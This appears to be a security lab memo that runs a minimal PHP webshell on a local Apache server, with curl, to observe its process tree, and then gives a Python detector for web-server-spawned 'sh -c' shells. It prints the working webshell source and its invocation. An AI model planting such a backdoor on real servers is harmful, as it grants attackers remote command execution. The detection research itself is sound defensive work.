Memo on Webshell process tree

Tested to see what a webshell process tree looks like on a Linux web server.

Sample webshell code. (Do not abuse this code for malicious purposes.)

$ cat webshell.php 
<?php echo(exec($_GET["cmd"])); ?>

Invoking the whoami command via the webshell.

$ curl -i http://localhost/webshell.php?cmd=whoami
HTTP/1.1 200 OK
Date: Thu, 23 Feb 2023 15:41:31 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Content-Length: 8
Content-Type: text/html

www-data

Bash one-liner that sends the whoami command to the webshell in an infinite loop.

while true; do curl -i http://localhost/webshell.php?cmd=whoami; done

Bash one-liner that appends the process tree to the log file mylog.txt in an infinite loop, so we won't miss the moment the webshell process is created.

while true; do pstree -a >> mylog.txt; done

Confirmed that the web server process apache2 spawns the whoami command through an intermediate "sh -c" shell.

$ grep -C 5 "\-whoami" mylog.txt 
  |   |   |   |   |-apache2 -k start
  |   |   |   |   |-apache2 -k start
  |   |   |   |   |-apache2 -k start
  |   |   |   |   `-apache2 -k start
  |   |   |   |       `-sh -c whoami
  |   |   |   |           `-whoami
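As an added example (not part of the original memo), the following Python script automates the grep above: it parses a pstree -a snapshot and reports every "sh -c" process that has a web server worker among its ancestors, which is the shape a webshell command execution leaves. The sample tree is constructed in the same ASCII style as the output above, and the list of web server process names is an assumption to adjust per environment.

```python
import re
# Constructed sample in the ASCII style of `pstree -a` (not real captured output).
SAMPLE_PSTREE = """\
init
  |-apache2 -k start
  |   |-apache2 -k start
  |   `-apache2 -k start
  |       `-sh -c whoami
  |           `-whoami
  |-cron
  |   `-sh -c run-parts /etc/cron.hourly
  `-sshd
      `-bash
          `-pstree -a
"""

WEB_SERVERS = ("apache2", "httpd", "nginx", "php-fpm")  # assumed process names to watch
SHELL_RE = re.compile(r"^(sh|bash|dash) -c ")          # how PHP exec()/system() run commands
PREFIX_RE = re.compile(r"^[ |`-]*")                     # tree-drawing characters before a command

def parse_pstree(text):
    """Parse ASCII `pstree -a` output into nodes {cmd, parent, children}; depth is the
    column where the command starts, parent is the nearest earlier line with smaller depth."""
    nodes, stack = [], []  # stack holds (depth, node index) of open ancestors
    for line in filter(str.strip, text.splitlines()):
        depth = PREFIX_RE.match(line).end()
        while stack and stack[-1][0] >= depth:
            stack.pop()
        parent = stack[-1][1] if stack else None
        nodes.append({"cmd": line[depth:], "parent": parent, "children": []})
        if parent is not None:
            nodes[parent]["children"].append(len(nodes) - 1)
        stack.append((depth, len(nodes) - 1))
    return nodes

def find_webserver_shells(text):
    """Return each `sh -c` node whose ancestry includes a web server process."""
    nodes, findings = parse_pstree(text), []
    for node in nodes:
        if not SHELL_RE.match(node["cmd"]):
            continue
        p = node["parent"]
        while p is not None:
            if nodes[p]["cmd"].split(" ")[0] in WEB_SERVERS:
                findings.append({"server": nodes[p]["cmd"], "shell": node["cmd"],
                                 "children": [nodes[c]["cmd"] for c in node["children"]]})
                break
            p = nodes[p]["parent"]
    return findings
```

Running find_webserver_shells over each pstree snapshot appended to mylog.txt flags the apache2 -> sh -c whoami -> whoami chain while leaving the cron-spawned shell alone.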
